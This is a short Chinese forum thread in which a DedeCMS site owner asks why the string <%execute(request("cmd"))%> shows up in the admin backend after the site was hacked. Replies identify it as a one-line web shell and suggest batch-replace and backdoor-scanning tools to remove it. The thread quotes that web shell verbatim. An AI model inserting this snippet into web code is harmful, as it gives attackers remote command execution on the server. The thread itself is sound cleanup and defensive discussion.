分享

登陆后台,有一串代码<%execute(request("cmd"))%>|DedeCMS 安装使用

 看见就非常 2014-07-30
[backcolor= transparent]登陆后台之后,最上面出现一道空白,显示<%execute(request("cmd"))%>
[backcolor= transparent]其他地方有的也会显示这一串代码,谁知道是怎么回事,前几天被挂链接了。如下图所示
[backcolor= transparent]
评价一下你浏览此帖子的感受

支持下

愤怒

哥笑了

优秀

飘过
离线413222859

发帖
587
贡献值
313
威望值
106
技术分
0
织梦币
0
只看该作者 1 发表于: 2013-06-13
不清楚。。
离线djhding

发帖
419
贡献值
191
威望值
44
技术分
0
织梦币
0
只看该作者 2 发表于: 2013-06-13
很早很早的一个,一句话木马,
离线laputallzz

发帖
31
贡献值
182
威望值
4
技术分
0
织梦币
0
只看该作者 3 发表于: 2013-06-13
回 djhding 的帖子
djhding:很早很早的一个,一句话木马, (2013-06-13 11:32) 

请问你知道怎么清除吗
离线djhding

发帖
419
贡献值
191
威望值
44
技术分
0
织梦币
0
只看该作者 4 发表于: 2013-06-13
回 laputallzz 的帖子
laputallzz:请问你知道怎么清除吗 (2013-06-13 14:27) 

给你推荐一个软件:Advanced Find and Replace 7 批量替换软件
还有一个:phpscan,PHP后门扫描工具

但是如果是utf8的程序请用专用软件打开修改,如果GBK的那就直接用这个软件批量替换就好了。

还有检查后台各个地方,有的删掉了还会出现,说明在某个地方还有,一访问即触发

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多